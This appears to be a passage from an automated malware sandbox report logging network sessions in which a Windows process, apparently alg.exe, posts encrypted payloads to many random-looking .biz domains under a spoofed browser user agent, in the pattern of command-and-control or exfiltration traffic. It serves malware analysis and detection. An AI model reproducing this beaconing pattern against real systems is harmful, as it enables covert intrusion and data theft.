Nov 18, 2024 09:59:13.354842901 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2d9b874abce60a431b2f6cbd5bb3d157|155.94.241.187|1731920353|1731920353|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.10 | 50072 | 18.246.231.120 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:14.271732092 CET | 353 | OUT | POST /hiumlgdcypdn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:14.271754026 CET | 778 | OUT | Data Raw: bf 74 7b a6 50 fd 65 91 fe 02 00 00 2f 4a 4f 4a ce 3d 9d 08 bf 6a c7 6b 67 d1 34 6b 11 9f 84 3d 29 0e 36 7a 9a bd 05 7e 4b 81 78 d5 0f 44 c9 c1 f5 1a 37 dd 49 4b 18 46 be 5d 8e 02 df 54 9b cc 05 69 b1 cf e7 54 20 40 12 c7 c6 d6 61 c3 57 02 5d de
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: t{Pe/JOJ=jkg4k=)6z~KxD7IKF]TiT @aW](a$?-GyZ/-i%J6Vu[&:kJd:*/X`>Xni7vp1tUj m%r$.hGQHj!Q5b.W2pGrzqc
Nov 18, 2024 09:59:15.101429939 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=70bba89638a9827e1dd9f3cfeb125e04|155.94.241.187|1731920354|1731920354|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
94 | 192.168.2.10 | 50073 | 34.211.97.45 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:14.569719076 CET | 352 | OUT | POST /eppbxqyetuy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:14.569819927 CET | 834 | OUT | Data Raw: 52 9d c6 1c da d5 f4 54 36 03 00 00 e4 23 a3 13 35 7c 06 52 12 14 bd 57 d1 a4 99 fc ae ce ae 56 5c 86 5f b1 61 38 1f 7f da 5d fb a7 ca 64 8c bf 5b 7a 82 c8 5a c7 1d 9c e2 df 1f f5 2e 0c 59 8e b5 57 46 b4 b9 8f ad 17 8b 58 53 49 c5 e6 0c 9f 72 d1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RT6#5|RWV\_a8]d[zZ.YWFXSIrV7S#:93<5[\/ks(X5%QG_{%vW /pV/>M:3y)Pu@eW^v7&|0\!F^X
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.399615049 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=82d9cd26e115b429234ec4574bfdb1cc|155.94.241.187|1731920355|1731920355|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
95 | 192.168.2.10 | 50074 | 54.244.188.177 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:15.479372025 CET | 352 | OUT | POST /dsmegxny HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:15.479401112 CET | 834 | OUT | Data Raw: ac 1f af b9 1d 5b 95 79 36 03 00 00 93 45 1e 7f 6f 39 03 c2 15 14 8f bc 75 6e 34 dd 83 ea 55 81 62 77 2e 81 51 95 47 36 22 de f8 52 a3 a3 1a ee 9f e6 29 5d aa 52 31 cb 27 28 8a dd 77 9d d7 1f 2e 64 5a a7 2d f6 d2 ac d5 4d ca 22 6e a4 d9 e4 c1 ca
Data Ascii: [y6Eo9un4Ubw.QG6"R)]R1'(w.dZ-M"n>& VXO9EAfa6mk]A%m%/q5(Z1"uIW)d+@UX <:8m#vP,I(,P2fkWhEo0
Nov 18, 2024 09:59:16.299072027 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3bfab5e9d2ee28467989a390c564da02|155.94.241.187|1731920356|1731920356|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.10 | 50075 | 44.221.84.105 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:15.710880041 CET | 346 | OUT | POST /yk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hehckyov.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:15.710902929 CET | 778 | OUT | Data Raw: fa 1e 39 c0 54 0e b0 c7 fe 02 00 00 28 39 1c 79 c5 a9 22 f4 64 1b b9 48 e9 d4 38 98 46 b2 a5 a0 c4 aa 33 2a 42 80 6c fa b3 33 75 32 d5 7e 0f 07 b0 fd 88 b5 85 91 96 0c f1 ee 62 79 86 3b 5f 21 9c 49 4f ea 29 11 d5 b2 e9 7c de 87 d6 73 04 0c 8f 21
Data Ascii: 9T(9y"dH8F3*Bl3u2~by;_!IO)|s!k"F<%YJ'(/<+wuo4^2tIq{FgUUL).L&9".lo]^mF*X"7)8K
Nov 18, 2024 09:59:16.360620022 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a2a6f77d5d17270b661c5ef0dcbc9a2f|155.94.241.187|1731920356|1731920356|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
97 | 192.168.2.10 | 50076 | 18.141.10.107 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:16.318408012 CET | 349 | OUT | POST /cpdavm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:16.318419933 CET | 834 | OUT | Data Raw: a5 0c 22 6b a3 b6 79 a9 36 03 00 00 0d 82 76 ec 70 c3 cc 04 64 df 1e fb 97 1d e7 5b e2 02 f8 09 17 fa 13 e0 9d ba b9 8c e4 49 8e f3 bd 94 93 03 4a 3b 03 8e 48 49 8d 1e b7 f7 5f b6 5f 48 6f eb 93 29 96 23 26 91 40 2e 11 d4 d2 f6 cf 5f d4 cf b7 86
Data Ascii: "ky6vpd[IJ;HI__Ho)#&@._$2!RsDGj9#:maHOm}Q}>G:RuZ2NDB0DC|vI<V=KY>rggg+c-XG3q<u$!s}{8
Nov 18, 2024 09:59:17.830176115 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:17 GMT
Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=69002240a2df54eb61b7ce531f59f1fb|155.94.241.187|1731920357|1731920357|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110455990 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=69002240a2df54eb61b7ce531f59f1fb|155.94.241.187|1731920357|1731920357|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.10 | 50077 | 54.244.188.177 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:16.736795902 CET | 350 | OUT | POST /tjwoaphj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:16.737037897 CET | 778 | OUT | Data Raw: 9d d7 7a d1 79 28 19 77 fe 02 00 00 49 70 e6 7e 6c 05 b0 7d ca 44 48 71 a9 22 00 e4 e8 45 78 fe 79 9c 02 33 cd cb 56 f2 14 e4 c5 20 3b fb ec 11 28 0e e0 a4 51 b1 15 a6 26 c4 2a 1b c8 42 4f 50 26 0d 5d d8 d8 c7 5b 65 90 e1 1b a1 91 60 98 1c c9 a8
Data Ascii: zy(wIp~l}DHq"Exy3V ;(Q&*BOP&][e`^?f>%!`"Pq;dQ{_]h:/S5bs5Bd*:.3-0.RELD2rU8_^q7
Nov 18, 2024 09:59:17.829994917 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d9dd128066440ce2240c8ff779d718ae|155.94.241.187|1731920357|1731920357|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Nov 18, 2024 09:59:18.110440016 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d9dd128066440ce2240c8ff779d718ae|155.94.241.187|1731920357|1731920357|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        99192.168.2.105007818.208.156.24880
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.131499052 CET343OUTPOST /tq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.131511927 CET834OUTData Raw: c2 9d f9 8f 7c 99 ca 0b 36 03 00 00 3e 44 76 ac 9e 71 14 96 b9 27 a4 5b 16 52 35 77 c5 ca ea 47 6f 09 ab 4d 55 c3 22 75 28 4f b2 83 1f f6 35 2c a4 0f a9 e2 d8 e6 36 1f 46 df ca b8 12 02 45 8c dc a3 4f 21 2a 2b 2d cf 82 aa 49 fb c1 db 49 6a ba 15
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |6>Dvq'[R5wGoMU"u(O5,6FEO!*+-IIj5Q(FG~<!"]#D"Rs#wRd46.zi^bVoO/Ve>R4[rRM<1R|Az:(W8W(_eg9mQ<YVN
Nov 18, 2024 09:59:18.799309969 CET  413  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f99d3400413ec402deefa4f7e811a215|155.94.241.187|1731920358|1731920358|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
100         192.168.2.10  50079        3.254.94.185    80                7888  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:59:18.317615032 CET  346  OUT  POST /nkklk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:19.299871922 CET  413  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=362bf28174c7542b1a550ed47a47d496|155.94.241.187|1731920359|1731920359|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port
101         192.168.2.10  50080        44.221.84.105   80

Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:59:19.033890009 CET  356  OUT  POST /tynixdppnmlq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:19.707056999 CET  416  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=986430da78262c8560e41cbb3d0d8796|155.94.241.187|1731920359|1731920359|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
102         192.168.2.10  50081        18.141.10.107   80                7888  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:59:19.581500053 CET  350  OUT  POST /fxciie HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: eufxebus.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:21.045259953 CET  416  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=03701bfeec9d6198124e327c9cd8347f|155.94.241.187|1731920360|1731920360|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
103 | 192.168.2.10 | 50082 | 18.141.10.107 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:19.757873058 CET | 357 | OUT | POST /kwdmltggrfrmu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:21.229037046 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ef0a6d7a6bd508a3ae68f2aad61a4afe|155.94.241.187|1731920360|1731920360|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
104 | 192.168.2.10 | 50083 | 18.246.231.120 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:21.443382978 CET | 343 | OUT | POST /st HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:22.316319942 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e2f9469e285501c3bd44d633ca362252|155.94.241.187|1731920362|1731920362|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.10 | 50084 | 34.246.200.160 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:21.837865114 CET | 351 | OUT | POST /rfcbglebj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:22.814475060 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5878ad791dae4b3a8b54fd3b3f1a27f7|155.94.241.187|1731920362|1731920362|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
106 | 192.168.2.10 | 50085 | 18.208.156.248 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:22.507057905 CET | 347 | OUT | POST /ugn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
